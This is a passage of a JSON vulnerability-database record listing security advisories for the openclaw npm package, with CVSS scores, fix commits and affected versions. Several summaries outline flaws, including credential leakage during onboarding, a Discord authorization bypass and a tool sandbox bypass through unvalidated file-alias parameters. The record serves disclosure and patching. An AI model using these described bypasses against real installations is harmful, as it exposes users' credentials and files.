4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-w6wx-jq6j-6mcj"},{"reference_url":"https://github.com/advisories/GHSA-w6wx-jq6j-6mcj","reference_id":"GHSA-w6wx-jq6j-6mcj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-w6wx-jq6j-6mcj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["GHSA-w6wx-jq6j-6mcj"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-258k-a4dw-tfae"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90123?format=json","vulnerability_id":"VCID-26kp-dbu2-pqej","summary":"OpenClaw: Endpoint persists after trust decline, leaking gateway credentials\n## Summary\nRemote onboarding preserves attacker-discovered endpoint after trust decline, routing gateway credentials to it\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Real shipped onboarding trust-decline bug because the declined discovered URL survived into the manual prompt, but operator acceptance of that prefill is still required, so medium.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `2a75416634837c21ed05b8c3ed906eb7a7807060` — 2026-03-30T20:03:06+01:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @zsxsoft for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41300","reference_id":"","reference_type":"","scores":[{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11185","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11219","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11226","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41300"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/2a75416634837c21ed05b8c3ed906eb7a7807060","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:02:56Z/"}],"url":"https://github.com/openclaw/openclaw/commit/2a75416634837c21ed05b8c3ed906eb7a7807060"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9f4w-67g7-mqwv","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:02:56Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9f4w-67g7-mqwv"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41300","reference_id":"CVE-2026-41300","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41300"},{"reference_url":"https://github.com/advisories/GHSA-9f4w-67g7-mqwv","reference_id":"GHSA-9f4w-67g7-mqwv","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9f4w-67g7-mqwv"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-attacker-discovered-endpoint-preservation-in-remote-onboarding","reference_id":"openclaw-attacker-discovered-endpoint-preservation-in-remote-onboarding","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:02:56Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-attacker-discovered-endpoint-preservation-in-remote-onboarding"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41300","GHSA-9f4w-67g7-mqwv"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-26kp-dbu2-pqej"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89601?format=json","vulnerability_id":"VCID-26sg-e29u-hkf3","summary":"OpenClaw: Discord voice ingress authorization can be bypassed via channel, name, and stale-role validation gaps\n## Summary\nDiscord voice ingress authorization can be bypassed via channel, name, and stale-role validation gaps\n\n## Current Maintainer Triage\n- Status: narrow\n- Assessment: Real in shipped v2026.3.28 Discord voice ingress, but impact is channel/member allowlist bypass rather than a broader critical auth break and mainline fix is unreleased.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `dba96e7507e0900f120e5e28e57755d69bf78759` — 2026-03-31T21:29:13+09:00\n\nOpenClaw thanks @cyjhhh for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41382","reference_id":"","reference_type":"","scores":[{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10395","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10436","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10417","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41382"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/dba96e7507e0900f120e5e28e57755d69bf78759","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:33:03Z/"}],"url":"https://github.com/openclaw/openclaw/commit/dba96e7507e0900f120e5e28e57755d69bf78759"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-x2m8-53h4-6hch","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:33:03Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-x2m8-53h4-6hch"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41382","reference_id":"CVE-2026-41382","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41382"},{"reference_url":"https://github.com/advisories/GHSA-x2m8-53h4-6hch","reference_id":"GHSA-x2m8-53h4-6hch","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-x2m8-53h4-6hch"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-discord-voice-ingress-authorization-bypass-via-channel-and-role-validation-gaps","reference_id":"openclaw-discord-voice-ingress-authorization-bypass-via-channel-and-role-validation-gaps","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:33:03Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-discord-voice-ingress-authorization-bypass-via-channel-and-role-validation-gaps"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41382","GHSA-x2m8-53h4-6hch"],"risk_score":2.5,"exploitability":"0.5","weighted_severity":"4.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-26sg-e29u-hkf3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91252?format=json","vulnerability_id":"VCID-26sv-grsd-abcw","summary":"Duplicate Advisory: OpenClaw's message tool media parameter bypasses tool policy filesystem isolation\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-v8wv-jg3q-qwpq. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.24 contains a sandbox bypass vulnerability in the message tool that allows attackers to read arbitrary local files by using mediaUrl and fileUrl alias parameters that bypass localRoots validation. Remote attackers can exploit this by routing file requests through unvalidated alias parameters to access files outside the intended sandbox directory.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/1d7cb6fc03552bbba00e7cffb3aa9741f5556416","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/1d7cb6fc03552bbba00e7cffb3aa9741f5556416"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-v8wv-jg3q-qwpq","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","